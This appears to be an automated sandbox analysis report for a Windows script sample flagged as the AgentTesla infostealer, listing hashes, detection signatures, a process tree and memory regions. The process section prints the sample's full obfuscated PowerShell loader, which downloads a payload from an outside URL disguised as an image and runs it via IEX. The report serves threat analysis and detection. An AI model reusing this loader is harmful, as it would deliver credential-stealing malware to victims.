Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-02-2024 05:38

General

  • Target

    d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf

  • Size

    2KB

  • MD5

    380c9e85f6960add801843076c33ec3b

  • SHA1

    53f4ebaa47e325b25feaf22211dcff9223dc2ccc

  • SHA256

    d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277

  • SHA512

    88e6a1f62735e5116041dfa23c0a3743f3f31b6372c4af698323e7eddd028eff7d10bb83b883bda6e3aa2171827efb661eacd7e7d7db4ca8891919b134986e35

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 1 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
  • Detects executables manipulated with Fody 1 IoCs
  • Detects executables packed with Costura DotNetGuard 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://didaktik-labor.de/mx1.jpg';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3416

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tgathpes.1oh.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3416-26-0x0000000006330000-0x00000000063CC000-memory.dmp

    Filesize

    624KB

  • memory/3416-23-0x0000000005310000-0x0000000005376000-memory.dmp

    Filesize

    408KB

  • memory/3416-29-0x0000000074970000-0x0000000075120000-memory.dmp

    Filesize

    7.7MB

  • memory/3416-20-0x0000000074970000-0x0000000075120000-memory.dmp

    Filesize

    7.7MB

  • memory/3416-27-0x0000000006A70000-0x0000000006B02000-memory.dmp

    Filesize

    584KB

  • memory/3416-25-0x0000000006240000-0x0000000006290000-memory.dmp

    Filesize

    320KB

  • memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3416-21-0x0000000005940000-0x0000000005EE4000-memory.dmp

    Filesize

    5.6MB

  • memory/3416-30-0x00000000054D0000-0x00000000054E0000-memory.dmp

    Filesize

    64KB

  • memory/3416-28-0x0000000006A10000-0x0000000006A1A000-memory.dmp

    Filesize

    40KB

  • memory/3416-22-0x00000000054D0000-0x00000000054E0000-memory.dmp

    Filesize

    64KB

  • memory/4468-14-0x000002B8E8070000-0x000002B8E8096000-memory.dmp

    Filesize

    152KB

  • memory/4468-16-0x000002B8EA460000-0x000002B8EA478000-memory.dmp

    Filesize

    96KB

  • memory/4468-24-0x00007FF86CBF0000-0x00007FF86D6B1000-memory.dmp

    Filesize

    10.8MB

  • memory/4468-5-0x000002B8E8010000-0x000002B8E8032000-memory.dmp

    Filesize

    136KB

  • memory/4468-10-0x00007FF86CBF0000-0x00007FF86D6B1000-memory.dmp

    Filesize

    10.8MB

  • memory/4468-13-0x000002B8E8090000-0x000002B8E80A0000-memory.dmp

    Filesize

    64KB

  • memory/4468-11-0x000002B8E8090000-0x000002B8E80A0000-memory.dmp

    Filesize

    64KB

  • memory/4468-12-0x000002B8E8090000-0x000002B8E80A0000-memory.dmp

    Filesize

    64KB

  • memory/4468-15-0x000002B8EA450000-0x000002B8EA45C000-memory.dmp

    Filesize

    48KB